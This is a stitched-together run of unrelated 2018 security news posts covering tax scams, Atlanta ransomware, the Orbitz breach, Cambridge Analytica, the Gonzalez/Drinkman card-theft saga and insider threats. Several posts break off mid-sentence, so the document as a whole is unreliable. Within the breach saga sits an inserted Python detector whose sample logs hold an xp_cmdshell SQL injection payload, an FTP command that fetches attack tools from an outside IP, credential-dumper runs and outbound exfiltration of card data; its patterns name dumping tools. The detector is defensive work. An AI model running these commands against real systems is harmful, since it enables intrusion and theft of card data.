According to the IRS, schemes are getting more sophisticated. By stealing client data from legitimate tax professionals or buying social security numbers on the black market, a criminal can file a fraudulent tax return. Once the IRS deposits the tax refund into the taxpayer’s account, crooks then use various tactics (phone or email requests) to reclaim the refund from the taxpayer. Multiple versions of this sophisticated scam continue to evolve. If you see suspicious funds in your account or receive a refund check you know is not yours, alert your tax preparer, your bank, and the IRS. To return erroneous refunds, take these steps outlined by the IRS.

Phone scams

If someone calls you claiming to be from the IRS demanding a past due payment in the form of a wire transfer or money order, hang up. Imposters have been known to get aggressive and will even threaten to deport, arrest, or revoke your license if you do not pay the alleged outstanding tax bill.

In a similar scam, thieves call potential victims posing as IRS representatives and tell them that two certified letters were previously sent and returned as undeliverable. The callers then threaten arrest if the victim does not immediately make a payment through a prepaid debit card. The scammer also tells the victim that the purchase of the card is linked to the Electronic Federal Tax Payment System (EFTPS).

Note: The IRS will never initiate an official tax dispute via phone. If you receive such a call, hang up and report the call to the IRS at 1-800-829-1040.

Robo calls

Baiting you with fear, scammers may also leave urgent “callback” requests through prerecorded phone robot or robo calls, or through a phishing email. Bogus IRS robo calls often politely ask taxpayers to verify their identity over the phone. These robo calls will even alter caller ID numbers to make it look as if the IRS or another official agency is calling.

Phishing schemes

Be on the lookout for emails with links to websites that ask for your personal information. According to the IRS, thieves now send very authentic-looking messages from credible-looking addresses. These emails coax victims into sharing sensitive information or contain links that contain malware that collects data.

To protect yourself, stay alert and be wary of any emails from financial groups or government agencies. Don’t share any information online, via email, phone or by text. Don’t click on random links sent to you via email. Once that information is shared anywhere, a crook can steal your identity and use it in different scams.

Human resource/data breaches

In one particular scam, crooks target human resource departments. In this scenario, a thief sends an email purporting to come from an organization executive. The email is sent to an employee in the payroll or human resources department, requesting a list of all employees and their Forms W-2. This scam is sometimes referred to as business email compromise (BEC) or business email spoofing (BES).

Using the collected data criminals then attempt to file fraudulent tax returns to claim refunds. Or, they may sell the data on the Internet’s black market sites to others who file fraudulent tax returns or use the names and Social Security Numbers to commit other identity theft related crimes. While you can’t personally avoid this scam, be sure to inquire about your firm’s security practices and try to file your tax return early every year to beat any potentially false filing. Businesses/payroll service providers should file a complaint with the FBI’s Internet Crime Complaint Center (IC3).

As a reminder, the IRS will never:

  • Call to demand immediate payment over the phone, nor will the agency call about taxes owed without first having mailed you several bills.
  • Call or email you to verify your identity by asking for personal and financial information.
  • Demand that you pay taxes without giving you the opportunity to question or appeal the amount they say you owe.
  • Require you to use a specific payment method for your taxes, such as a prepaid debit card.
  • Ask for credit or debit card numbers over the phone or e-mail.
  • Threaten to immediately bring in local police or other law-enforcement groups to have you arrested for not paying.

If you are the victim of identity theft, be sure to take the proper reporting steps. If you receive any unsolicited emails claiming to be from the IRS, forward them to phishing@irs.gov (and then delete the emails).

This post is part II of our series on keeping your family safe during tax time. To read more about helping your teen file his or her first tax return, here’s Part I.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

The post Don’t Get Duped: How to Spot 2018’s Top Tax Scams appeared first on McAfee Blogs.

City of Atlanta systems infected with ransomware; sensitive data at risk

The FBI and the US Department of Homeland Security are investigating a cyberattack against the municipality of Atlanta, said Atlanta Mayor Keisha Lance Bottoms. The city’s computer systems were taken offline on Thursday following a ransomware infection that encrypted data, holding it hostage while demanding a ransom in bitcoin.

City officials confirmed on Twitter that the incident caused “outages on various customer-facing applications, including some that customers may use to pay bills or access court-related information.”

The 911 emergency and response systems, police department systems, airport operations, water and public safety were not affected. The municipality hasn’t yet decided whether to pay the ransom, and is still investigating the nature of the damage on the network servers.

There is no strong evidence to indicate hackers accessed any personal information belonging to city employees and citizens, but all are encouraged to remain vigilant and monitor their credit cards and online accounts for illegal activities in case data has been stolen.

“This is a very serious situation,” Bottoms said. “We don’t know the extent, so I would ask for people to assume that you may be included. Let’s just assume that if your personal information is housed by the City of Atlanta, whether it be because you are a customer who goes online and pays your bills or any employee or even a retiree, we don’t know the extent, so we just ask that you be vigilant.”

Facebook and Cambridge Analytica – What’s Happened So Far

Top Story— Facebook has just lost over $60 billion in market value over the past two days—that's more than Tesla's entire market capitalisation and almost three times that of Snapchat. Facebook shares plunge over revelations that personal data of 50 million users was obtained and misused by British data analytics firm 'Cambridge Analytica,' who reportedly helped Donald Trump win the US

Does Patching Make Perfect?

We’ve heard it time and time again: patches and updates are the key to mitigating vulnerabilities that lead to epic Equifax-sized breaches. The logic goes that security incidents can be

The post Does Patching Make Perfect? appeared first on The Cyber Security Place.

DevOps Security Watch: Three Trends To Track In 2018

In the face of incessant competition, countless organizations are turning to DevOps to improve efficiency and accelerate innovation. While this approach delivers proven benefits, DevOps is also creating new security

The post DevOps Security Watch: Three Trends To Track In 2018 appeared first on The Cyber Security Place.

Travel Agency Orbitz Hit with Data Breach, 880,000 Payment Cards Affected

We all love a good getaway, and as we look ahead to spring and summer, most of us are already planning our next vacation. To do that, we’ll tap one of the many online travel agencies out there to help us organize our plans. Only now, some travel-goers may have to stop trip planning so they can start planning for credit monitoring, as one of the most popular travel agencies, Orbitz.com, was hit with a data breach that may have exposed as many as 880,000 payment cards.

The online travel agency reported two separate data disclosures, as an attacker may have accessed customers’ personal information shared on Orbitz.com and a handful of associated websites between Jan. 1, 2016 and Dec. 22, 2017.

What’s more – in addition to the payment cards, hackers may have also stolen customers’ full name, date of birth, phone number, email address, physical and/or billing address and gender information. Now, with all this personal information potentially out in the open, it’s important affected customers start thinking about protecting their personal identities. To do just that, follow these tips:

  • Regularly review your online account info. Things like regularly reviewing transactions online and making sure account contact info hasn’t changed are good for keeping tabs on anyone trying to hijack your account.
  • Set up an alert. If you know there’s a chance your personal data has been compromised, place a fraud alert on your credit so that any new or recent requests undergo scrutiny. This also entitles you to extra copies of your credit report so you can check for anything suspicious. If you find an account you did not open, report it to the police or Federal Trade Commission, as well as the creditor involved so you can close the fraudulent account.
  • Consider an identity theft protection solution. With this breach and others before it, consumers are faced with the possibility of identity theft. McAfee Identity Theft Protection allows users to take a proactive approach to protecting their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Travel Agency Orbitz Hit with Data Breach, 880,000 Payment Cards Affected appeared first on McAfee Blogs.

880,000 payment cards data breached in Orbitz security incident

Travel booking website Orbitz, part of online travel agency Expedia, confirmed a data security incident was detected on March 1, possibly exposing the personal information associated with some 880,000 payment cards.

The breach affected both the partner and consumer platforms between 2016 and 2017. American Express announced its own platforms have not been compromised.

“We took immediate steps to investigate the incident and enhance security and monitoring of the affected platform,” Orbitz said. “As part of our investigation and remediation work, we brought in a leading third-party forensic investigation firm and other cybersecurity experts, began working with law enforcement and took swift action to eliminate and prevent unauthorized access to the platform.”

Following the investigation, the company believes hackers may have accessed names, payment card information, dates of birth, phone numbers, email addresses, physical and/or billing addresses and gender. Attackers did not have access to Social Security numbers (for US customers) or to passport and travel information, and Orbitz says it has no direct evidence that any data was actually taken as a result of this incident.

“To date, we do not have direct evidence that this personal information was actually taken from the platform and there has been no evidence of access to other types of personal information, including passport and travel itinerary information,” Orbitz said.

Orbitz is reaching out to all affected customers and offers credit monitoring and identity protection free of charge for one year.

Expedia’s Orbitz Says 880,000 Payment Cards Compromised in Security Breach

Chicago-based online travel booking company Orbitz, a subsidiary of Expedia, reveals that one of its old websites has been hacked, exposing nearly 880,000 payment card numbers of the people who made purchases online. The data breach incident, which was detected earlier this month, likely took place somewhere between October 2016 and December 2017, potentially exposing customers' information

Survey: 48 Percent of US Government Employees Take No Responsibility for Cybersecurity Risks

A recent survey revealed that only 13 percent of U.S. government employees believe they are personally responsible for addressing cybersecurity risks, and 48 percent take no responsibility at all.

The report from Dtex Systems, “Uncovering the Gaps: Security Perceptions and Behaviors of Today’s Government Employees,” surveyed 1,000 public and private sector employees and extracted a subset of government employees as the basis for its findings.

In addition to the fact that nearly half of respondents denied any responsibility for security, the study also found that 1 in 3 government employees believe they are more likely to be struck by lightning than to suffer a data breach.

A False Sense of Security

CNBC suggested that the survey respondents may have a false sense of confidence, pointing out that U.S. government spending on cybersecurity jumped from $7.5 billion in 2007 to $28 billion in 2016. That increase is largely in response to the constant nature of threats such as phishing and ransomware: According to a Symantec report, 1 in 131 emails sent in 2017 contained malicious attachments, and ransomware increased by 36 percent over the previous year.

“We’re all — as individuals, as organizations and as a country — facing near constant security attacks from trusted insiders, malicious cybercriminals or nation-state actors,” said Christy Wyatt, CEO at Dtex Systems, as quoted by CNBC.

Despite that investment, the Dtex survey revealed that fewer than half of government employees are wary of risky behaviors such as emailing confidential data, ignoring or working around security protocols, or downloading files from websites they haven’t visited before. Meanwhile, only 43 percent said they had ever reported a colleague who showed risky behavior, even though 86 percent said they believe it is important to do so.

Government Contractors Fail to Address Cybersecurity Risks

It’s not just public sector employees that fail to take IT security seriously. Nearly half of the government contractors surveyed for a BitSight study earned a grade of “below C” in terms of how well they applied the National Institute of Standards and Technology (NIST)’s Protective Technology countermeasures. Some issues included the use of older browser versions with security vulnerabilities, insufficient email protection and network encryption that didn’t work as well as it should.

The post Survey: 48 Percent of US Government Employees Take No Responsibility for Cybersecurity Risks appeared first on Security Intelligence.

Facebook caught up in political data scandal; denies data breach

Lawmakers from the US and Europe demand explanations from Facebook following statements that it shared user data with Cambridge Analytica, a political analytics firm linked to US President Donald Trump, while the 2016 presidential election was in full swing, writes The New York Times. By using the data to profile users, the firm may have helped Trump win the presidential election.

User data was collected through an application named “thisisyourdigitallife,” created by University of Cambridge psychology lecturer Dr. Aleksandr Kogan. Under the name Global Science Research (GSR), Kogan asked users to take part in a survey presented as academic research, in exchange for a small fee. More than 270,000 users willingly took the survey, but through their profiles Kogan harvested the data of over 50 million users, who had not set their profiles to private.

According to Facebook, the data scandal is not the result of a breach.

“The claim that this is a data breach is completely false,” reads a company update from March 17, 2018, 9:50 AM. “Aleksandr Kogan requested and gained access to information from users who chose to sign up to his app, and everyone involved gave their consent. People knowingly provided their information, no systems were infiltrated, and no passwords or sensitive pieces of information were stolen or hacked.”

On Friday, Facebook also confirmed it became aware of the situation in 2015, following complaints from users. It removed the application from the network and asked Kogan to delete the data.

Christopher Wylie, a whistleblower and former collaborator of Aleksandr Kogan, said the data has not been deleted and brought proof to the New York Times and the Guardian.

“Facebook could see it was happening,” said Wylie in an interview with the Guardian. “Their security protocols were triggered because Kogan’s apps were pulling this enormous amount of data, but apparently Kogan told them it was for academic use. So they were like, ‘Fine’. Facebook made zero effort to get the data back.”

7 Digital Safety Tips for Teens Filing Their First Tax Returns

Landing that first part-time job in high school and filing your first tax return is a rite of passage for a young person. So why am I so anxious about my daughter becoming a taxpayer and sharing her pristine personal data with the U.S. government?

Where do I begin? The fact is, the more widely her personal information travels, the more digital risks she faces. Adding to my angst is my own experience with identity theft over a decade ago that still haunts me and is the last stress I’d wish upon my child or anyone else’s.

So as my daughter waves her W-2 at me and elatedly chatters about how she’s going to spend her refund, I — like so many other parents across the country — put on my coach’s hat for a key talk around the digital risks that come with tax season.

7 Tax Filing Safety Tips for Families

  1. Allow your child to file. Sometimes it’s easier just to file a 1040-EZ form for your child and be done with it. The wiser route is to take the time to teach your child the few steps needed to file correctly and the legal reasons we all must pay taxes. Part of this discussion is going over the digital risks of tax season such as identity theft, malware and viruses, and tax refund fraud.
  2. Discuss the power of a SSN. Talk about the responsibility and power of owning a Social Security Number (SSN) and why it must be safeguarded. A SSN is the most critical piece of government-issued identification an American citizen can possess. It is tied to personal credit and identification, and is the primary way the government tracks an individual’s earnings over his or her lifetime. The SSN is the golden ticket for cyber thieves who make a career of stealing and selling Social Security numbers and identities online.
  3. Secure all digital doorways. One of the ways cyber thieves gain access to personal information is through hacking, and the best way to slam that door is by creating strong passwords. Weak or reused passwords are one of the most common ways hackers unlock our data. Tax time is a perfect opportunity to challenge your child to create stronger passwords for all of his or her devices and email accounts. At the same time you upgrade password security, make sure updates on software, PCs, phones, and web browsers are current to protect your devices against viruses and malware that can grab login information.
  4. File early. Start the habit of early filing. The sooner you file your tax return and teach your child to do the same, the more you lessen the chance of a thief using yours or your child’s identity to claim a refund before your return goes through. According to the Identity Theft Resource Center, tax return fraud is on the rise due to more significant security breaches and the number of identities now for sale online.
  5. Be overly cautious every step of the way. Use a reputable firm or company to handle yours and your child’s tax return. Legitimate tax preparers must sign all forms with their IRS preparer identification number. If you end up filing the 1040-EZ form on paper, be sure to hand deliver your returns to the post office mailbox. Thieves target March and April as prime months for stealing tax information from curbside, residential mailboxes. Filing online? That’s fine if you do so over a secured Wi-Fi connection. The local coffee shop or library isn’t going to protect your tax information from unscrupulous, prying eyes. Look for HTTPS at the front of the Internal Revenue Service’s web address before submitting your documents.
  6. File a fraud alert. Because your child has rarely used his or her Social Security number, set up a fraud alert. By placing a fraud alert in your child’s name with the three main credit bureaus, you will be able to catch any credit fraud early. Since your child hasn’t built any credit, anything that comes back will be illegal activity. The fraud alert will remain in place for only 90 days, so when the time runs out you’ll need to reactivate it, several times a year if necessary. You can run a similar check by requesting an earnings record from the Social Security Administration; the record will reveal any earnings reported under your child’s Social Security number.
  7. Celebrate. Tax time tends to bring out the anxiety in just about everyone. Change that mentality with your child if possible. Make tax time rewarding. Go out for a celebration dinner or dessert. Congratulate him or her on filing safely and responsibly. And, don’t forget to recognize the even bigger accomplishment of stepping into the workforce and taking on the challenge of a first job.

This post is the first of a two-part series focused on digital safety during tax season. Next week, we will highlight some of the scams thieves use and how to safeguard your family.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

The post 7 Digital Safety Tips for Teens Filing Their First Tax Returns appeared first on McAfee Blogs.

UK at growing risk of major cyber incidents, terrorist attacks, research suggests

New data from a report on the UK threat landscape indicates the country’s emergency services are at risk of a major cyber-attack, which could open the door to terrorist attacks as well. Historically, the UK has had one of the highest rates of malware incidents.

The UK Threat Landscape report explores the UK’s Critical National Infrastructure against threats and possible vulnerabilities. Intelligence firm Anomali, which conducted the research, claims to have found a number of “weak spots” in the UK which could attract cyber attacks, and possibly even terrorist attacks.

The Defence Equipment and Supply Organisation, for example, presents a prime target for actors seeking to disrupt defense procurement. Emergency services are not far behind, and the UK’s energy infrastructure is nearly as exposed: 21% of all electricity is generated by 15 nuclear reactors, all owned by a single entity, EDF Energy.

“This combination of monopoly of ownership and geographic clustering means that the civil nuclear sector is constantly on a high state of alert for a terrorist and cyber-attack,” researchers say.

A number of attacks have already had huge effects on critical infrastructure across the UK. One recent example is the WannaCry ransomware epidemic in May 2017, which disrupted operations at roughly a third of NHS trusts in England, putting thousands of patients at risk. Of course, healthcare was not the only UK industry affected by the attack.

Critical infrastructure in the UK, as defined by the Centre for the Protection of National Infrastructure, includes such sectors as chemical, civil nuclear, communications, defense, emergency services, energy, finance, food, government, health, space, transport and water.

The UK, with the sixth-largest economy in the world, is a primary target for APT groups, cyber criminals and hacktivists. Analysts believe that Brexit presents geopolitical changes that will further factor into the overall threat landscape for the country.

Drinkman and Smilianets Sentenced: The End to Our Longest Databreach Saga?

On Thursday, February 15, 2018, we may have finally reached the end of the Albert Gonzalez Databreach Saga. Vladimir Drinkman, age 37, was sentenced to 144 months in prison, after pleading guilty before U.S. District Judge Jerome Simandle in New Jersey. His colleague, Dmitriy Smilianets, age 34, had also pleaded guilty and was sentenced to 51 months and 21 days in prison (which is basically "time served", so he'll walk immediately). The pair were actually arrested in the Netherlands on June 28, 2012, and the guilty pleas came in September 2015 after they were extradited to New Jersey.

Those who follow data breaches will certainly be familiar with Albert Gonzalez, but may not realize how far back his criminal career goes.

On July 24, 2003, the NYPD arrested Gonzalez in front of a Chase Bank ATM at 2219 Broadway and found him in possession of 15 counterfeit Chase ATM cards and $3,000 in cash (see case 1:09-cr-00626-JBS). After that arrest, Gonzalez was taken under the wing of a pair of Secret Service agents, David Esposito and Steve Ward. Gonzalez describes some of the activities he engaged in during his time as a confidential informant (CI) in the 53-page appeal he filed on March 24, 2011 from his prison cell in Milan, Michigan.

At one point, he claims that he explained to Agent Ward that he owed a Russian criminal $5,000 and he couldn't afford to pay it.  According to his appeal, he claims Ward told him to "Go do your thing, just don't get caught" and that Agent Ward later asked him if he had "handled it." Because of this, Gonzalez (who again, according to his own sentencing memo, likely has Asperger's) claims he believed that he had permission to hack, as long as he didn't get caught.

Over Christmas 2007, Gonzalez and his crew hacked Heartland Payment Systems and stole around 130 million credit and debit cards. He was also charged with hacking 7-Eleven (August 2007) and Hannaford Brothers (November 2007), from which he stole 4.2 million credit and debit cards. Two additional data breaches, against "Company A" and "Company B", were also listed. Gonzalez's indictment refers to "HACKER 1 who resided in or near Russia" and "HACKER 2 who resided in or near Russia." Another co-conspirator, "PT", was later identified as Patrick Toey, a resident of Virginia Beach, VA. (Patrick Toey's sentencing memorandum is a fascinating document that describes his first "cash out trip" working for Albert Gonzalez in 2003. Toey describes being a high school dropout who smoked marijuana and drank heavily, and who was "put on a bus to New York" by his mother to do the cash-out run because she needed rent money. Toey later moved in with Gonzalez in Miami, where he describes hacking Forever 21 "for Gonzalez" among other hacks.)

Gonzalez's extracurricular activities caught up with him when Maksym Yastremskiy (AKA Maksik) was arrested in Turkey. Another point of Gonzalez's appeal was to say that Maksik was tortured by Turkish police, and that without said torture he never would have confessed, which would have meant that Gonzalez (then acting online as "Segvec") would never have been identified or arrested. Gonzalez claims that he suffered from an inadequate defense, because his lawyer should have objected to the evidence "obtained under torture." These charges against Gonzalez were tried in the Eastern District of New York (2:08-cr-00160-SJF-AKT) and established that Gonzalez was part of the Dave & Buster's data breach.

On December 15, 2009, Gonzalez tried to shrug off some of his federal charges by filing a sentencing memo claiming that he lacked the "capacity to knowingly evaluate the wrongfulness of his actions," asserting that his criminal behavior "was consistent with description of the Asperger's disorder" and that he exhibited characteristics of "Internet addiction." Two weeks later, after unsuccessfully arguing that the court could not conduct its own psychological exam, Gonzalez signed a guilty plea under which the prosecutor would seek to limit his sentence to 17 years. He is currently imprisoned in Yazoo, Mississippi (FBOP # 25702-050), scheduled to be released October 29, 2025.

Eventually "HACKER 1" and "HACKER 2" were indicted themselves in April 2012, with an arrest warrant issued in July 2012, but because other co-conspirators were still at large, the indictment was not unsealed until December 18, 2013. HACKER 1 was Drinkman. HACKER 2 was Alexandr Kalinin, who was also indicted with Drinkman and Smilianets.

Shortly after the Target Data Breach, I created a presentation called "Target Data Breach: Lessons Learned" which drew heavily on the history of Drinkman and Smilianets. Some of their documented data breaches included:
Victim                    Date                  Damages
NASDAQ                    May 2007              loss of control
7-ELEVEN                  August 2007
Carrefour                 October 2007          2 million cards
JCPenney                  October 2007
Hannaford                 November 2007         4.2 million cards
Wet Seal                  January 2008
Commidea                  November 2008         30 million cards
Dexia Bank Belgium        Feb '08 - Feb '09
Jet Blue                  Jan '08 - Feb '11
Dow Jones                 2009
EuroNet                   Jul '10 - Oct '11     2 million cards
Visa Jordan               Feb - Mar '11         800,000 cards
Global Payments Systems   Jan '11 - Mar '12
Diners Club Singapore     Jun '11
Ingenicard                Mar '12 - Dec '12

During the time of these attacks, Dmitriy Smilianets was also a leading figure in professional video gaming. His team, Moscow 5, were the Intel Extreme Masters champions in the first League of Legends championship, also placing in the Counter-Strike category. Smilianets turned out not to be the hacker, but rather specialized in selling the credit cards that the other team members stole. Steal a few hundred million credit cards and you can buy a nice gaming rig!

Smilianets with his World Champion League of Legends team in 2012

How did these databreaches work?

Lockheed Martin's famous paper "Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains" laid out the phases of an attack like this:

But my friend Daniel Clemens had explained these same phases to me when he was teaching me the basics of Penetration Testing years before when he was first starting Packet Ninjas!

1. External Recon - Gonzalez and his crew scanned for Internet-facing SQL servers
2. Attack (Dan calls this "Establishing a Foothold") - using common SQL configuration weaknesses and SQL injection through the web front end, they caused a set of additional tools to be downloaded from the Internet
3. Internal Recon - these tools included a password dumper, password cracker, port scanner, and tools for bulk exporting data
4. Expand (Dan calls this "Creating a Stronghold") - usually this consisted of monitoring the network until they found a Domain Admin userid and password (for example, in the Heartland Payment Systems attack, the VERITAS userid was found to have the password "BACKUP", which unlocked every server on the network!)
5. Dominate - Gonzalez's crew would then schedule an SQL script to run nightly and dump the card data
6. Exfiltrate - the data was sent to remote servers via outbound FTP.

In Rolling Stone, Gonzalez claims he compromised more than 250 networks
In the Rolling Stone article "Sex, Drugs, and the Biggest Cybercrime of All Time", we also meet Steven Watt, who was charged in Massachusetts in October 2008 with providing attack tools to Gonzalez. Watt's tools were used in breaches including BJ's Wholesale Club, Boston Market, Barnes & Noble, Sports Authority, Forever 21, DSW, and OfficeMax. As part of his sentencing, Watt was ordered to repay $171.5 million.

Almost all of those databreaches followed the same model ... scan, SQL Inject, download tools, plant a foothold, convert it to a stronghold by becoming a domain admin, dominate the network, and exfiltrate the data. 

How did the TARGET data breach happen, by the way? Target is still listed as being "Unsolved" ... but let's review. An SQL injection led to downloaded tools (including NetCat, PSExec, QuarksPWDump, ElcomSoft's Proactive Password Auditor, SomarSoft's DumpSec, Angry IP Scanner for finding database servers, and Microsoft's OSQL and BCP (Bulk Copy)), a Domain Admin password was found (in Target's case, a BMC server monitoring tool running the default password), the POS malware was installed, and data exfiltration began.

Sound familiar???
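The six-step list above and the Target walkthrough describe the same chain, and the useful thing about a chain is that each link leaves a different kind of log. As an added example (not code from this post or from any of the investigations it cites), here is a small Python detector that tags constructed firewall, IIS, SQL Server, Sysmon-style and Windows logon lines with the stage they belong to and alerts when one host accumulates a foothold, a later stage and an outbound FTP session. The log format, asset map, "10." internal prefix, privileged-account list and regexes are assumptions a real deployment would replace with its own inventory and sources.

```python
"""Stage-tagging detector for the scan / inject / drop tools / domain admin /
nightly dump / FTP chain described above.

Added example, not code from the original post or any investigation.
All log lines, host names, IPs and account names below are constructed.
"""
import re
from collections import defaultdict

# --- Hypothetical environment assumptions --------------------------------
IP_TO_HOST = {"10.0.5.13": "db03"}                              # asset inventory
PRIVILEGED_ACCOUNTS = {"corp\\veritas", "corp\\administrator"}  # domain admins
RECON_THRESHOLD = 3          # distinct SQL-port targets seen from one source
EXFIL_PORTS = {"20", "21"}   # outbound FTP from an internal server

def is_internal(ip):
    """Assumption: the corporate network lives in 10.0.0.0/8."""
    return ip.startswith("10.")

# Host-local stages, numbered to match the list above.
STAGE_RULES = [
    ("2-foothold",       re.compile(r"xp_cmdshell|sp_configure|union\s+select|;\s*exec\b", re.I)),
    ("3-internal-recon", re.compile(r"pwdump|fgdump|cachedump|scan\.exe|nmap|angry\s*ip", re.I)),
    ("5-dominate",       re.compile(r"sp_add_job|schtasks|\bbcp\b|\bosql\b", re.I)),
]
FW_RE = re.compile(r"src=(\S+)\s+dst=(\S+)\s+dport=(\d+)\s+action=(\w+)")
LOGON_RE = re.compile(r"\b4624\b.*LogonType=3.*user=(\S+)\s+src=(\S+)", re.I)

# Constructed sample lines, format "<ts> <host> <source> <message>".
SAMPLE_LOGS = [
    "2008-01-03T01:02:10Z fw01 fw src=198.51.100.7 dst=10.0.5.11 dport=1433 action=block",
    "2008-01-03T01:02:11Z fw01 fw src=198.51.100.7 dst=10.0.5.12 dport=1433 action=block",
    "2008-01-03T01:02:12Z fw01 fw src=198.51.100.7 dst=10.0.5.13 dport=1433 action=allow",
    "2008-01-03T01:10:44Z web01 iis uri=/catalog.asp?id=1';EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;--",
    "2008-01-03T01:11:02Z db03 mssql xp_cmdshell: ftp -s:c:\\temp\\get.txt 198.51.100.7",
    "2008-01-03T01:30:00Z db03 sysmon ProcessCreate image=c:\\temp\\pwdump.exe parent=sqlservr.exe",
    "2008-01-03T01:32:15Z db03 sysmon ProcessCreate image=c:\\temp\\scan.exe args=10.0.0.0/16 -p 1433,445",
    "2008-01-04T03:00:01Z dc01 winsec 4624 LogonType=3 user=CORP\\veritas src=10.0.5.13",
    "2008-01-05T02:00:00Z db03 mssql sp_add_job name=nightly_dump command=bcp cards.dbo.track2 out c:\\temp\\d.dat",
    "2008-01-05T02:05:30Z fw01 fw src=10.0.5.13 dst=198.51.100.7 dport=21 action=allow bytes_out=48213344",
]

def parse_line(line):
    """'<ts> <host> <source> <message>' -> dict (constructed line format)."""
    ts, host, source, msg = line.split(" ", 3)
    return {"ts": ts, "host": host, "source": source, "msg": msg}

def summarize(lines):
    """Return {host: set(stage)} for every host that shows stage activity."""
    stages = defaultdict(set)
    probes = defaultdict(set)   # external src -> distinct internal dst on 1433
    for ev in map(parse_line, lines):
        host, msg = ev["host"], ev["msg"]
        for stage, rx in STAGE_RULES:          # stages visible on the host itself
            if rx.search(msg):
                stages[host].add(stage)
        m = FW_RE.search(msg)
        if m:                                  # stages visible at the perimeter
            src, dst, dport, action = m.groups()
            if not is_internal(src) and dport == "1433":
                probes[src].add(dst)
            if (is_internal(src) and not is_internal(dst)
                    and dport in EXFIL_PORTS and action == "allow"):
                stages[IP_TO_HOST.get(src, src)].add("6-exfiltrate")
        m = LOGON_RE.search(msg)
        if m:                                  # privileged network logon from a server
            user, src = m.groups()
            if user.lower() in PRIVILEGED_ACCOUNTS:
                stages[IP_TO_HOST.get(src, src)].add("4-stronghold")
    for src, targets in probes.items():        # one source sweeping the SQL port
        if len(targets) >= RECON_THRESHOLD:
            for dst in targets:
                stages[IP_TO_HOST.get(dst, dst)].add("1-external-recon")
    return dict(stages)

def alerts(summary):
    """Hosts showing a foothold, any later stage, and exfiltration."""
    later = {"3-internal-recon", "4-stronghold", "5-dominate"}
    return sorted(h for h, seen in summary.items()
                  if "2-foothold" in seen and "6-exfiltrate" in seen and seen & later)

if __name__ == "__main__":
    found = summarize(SAMPLE_LOGS)
    for host in sorted(found):
        print(host, sorted(found[host]))
    print("ALERT:", alerts(found))
```

Note what the alert does not require: it never asks whether the SQL injection itself was caught at the web tier. A blocked port scan, an xp_cmdshell execution, a pwdump process under sqlservr.exe and a 48 MB FTP session from a database server each have benign explanations on their own; the same host collecting all of them over three days does not.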

Justice?

With most of Gonzalez's crew in prison by 2010, the data breaches kept right on coming, thanks to Drinkman and Smilianets. 

Drinkman, the hacker, was sentenced to 144 months in prison.
Smilianets, the card broker, was sentenced to 51 months and 21 days, which was basically "time served" -- he was extradited to the US on September 7, 2012, so he'll basically walk.

Will Smilianets return to video gaming? to money laundering? or perhaps choose to go straight?

Meanwhile, Alexandr Kalinin, of St. Petersburg, Russia; Mikhail Rytikov, of Odessa, Ukraine; and Roman Kotov, of Moscow, Russia, are all still at large.  Have they learned from the fate of their co-conspirators? or are they in all likelihood, scanning networks for SQL servers, injecting them, dropping tools, planting footholds, creating strongholds, and exfiltrating credit card data from American companies every day?

Kalinin (AKA Grig, AKA "g", AKA "tempo") is wanted for hacking NASDAQ and planting malware that ran on the NASDAQ networks from 2008 to 2010.  (See the indictment in the Southern District of New York, filed 24JUL2013 ==> 1:13-cr-00548-ALC )

Mykhailo Sergiyovych Rytikov is wanted in the Western District of Pennsylvania for his role in a major Zeus malware case.  Rytikov leased servers to other malware operators.  Rytikov is also indicted in the Eastern District of Virginia along with Andriy DERKACH for running a "Dumps Checking Service" that processed at least 1.8 million credit cards in the first half of 2009 and that directly led to more than $12M in fraud.  ( 1:12-cr-00522-AJT filed 08AUG2013.)  Rytikov did have a New York attorney presenting a defense in the case -- Arkady Bukh argues that while Rytikov is definitely involved in web-hosting, he isn't responsible for what happens on the websites he hosts.

Roman Kotov, and Rytikov and Kalinin, are still wanted in New Jersey as part of the case 1:09-cr-00626-JBS (Chief Judge Jerome B. Simandle ). This is the same case Drinkman and Smilianets were just sentenced under.

Insider Threats – Recognize and Respond to the Risk Within

Ninety percent of organizations feel vulnerable to insider threats. That alarming statistic was recently published in the annual Insider Threat Report released by Crowd Research Partners. Survey respondents are almost as worried about malicious insiders (47%) as about accidental insiders (51%). What is one of the main enabling risk factors? Too many users with excessive access privileges. When those access privileges are in the hands of a malicious insider, the risks are significant. A disgruntled employee, or a non-deprovisioned ex-employee who feels wronged by their employer, possesses the two key components needed to cause damage: access and motivation.

Disgruntled/Rogue Employee 

Consider this example: Andrew Skelton, a senior IT auditor employed by Morrisons Supermarket PLC, deliberately leaked the payroll information of approximately 100,000 current and former Morrisons employees to a file sharing website and to three English newspapers. What was his motivation? Mr. Skelton held a grudge against Morrisons due to an earlier internal disciplinary matter. As a result of the data breach, over 5,000 current and former Morrisons employees filed a class action suit against Morrisons for damages incurred. In December 2017, England’s High Court of Justice Queens Bench Division ruled that Morrisons is vicariously liable for the actions of the disgruntled employee, Mr. Skelton. Clearly, privileged access in the hands of a disgruntled employee can produce extensive and far-reaching damage. 

The Ex-Employee 

A survey conducted by OneLogin produced another alarming statistic: fifty percent of ex-employees retain access to corporate applications after their employment has ended. When you consider that most disgruntled employees will end up leaving, either voluntarily or not, failure to deprovision means access and motivation are both in place to initiate a devastating attack. Even if the employment ends on friendly terms, the ex-employee could be recruited by malicious actors offering financial incentives for their access. The risk is very real. Twenty percent of the companies represented in the OneLogin survey experienced a data breach due to failure to deprovision an employee. Consider this example: Brian P. Johnson, an IT specialist and systems administrator for Georgia-Pacific, had his employment terminated on February 14, 2014, and was escorted off the premises. However, his access to corporate applications remained in place. He used his access to transmit harmful code and commands, in some instances bringing production at Georgia-Pacific’s Port Hudson mill to a standstill. FBI agents assigned to investigate the case concluded that Mr. Johnson intentionally sabotaged his former employer as payback.

As these data breaches show, failure to deprovision an ex-employee and failure to recognize and monitor a disgruntled employee led to significant losses to both company reputation and revenue.   

Recognize and Respond 

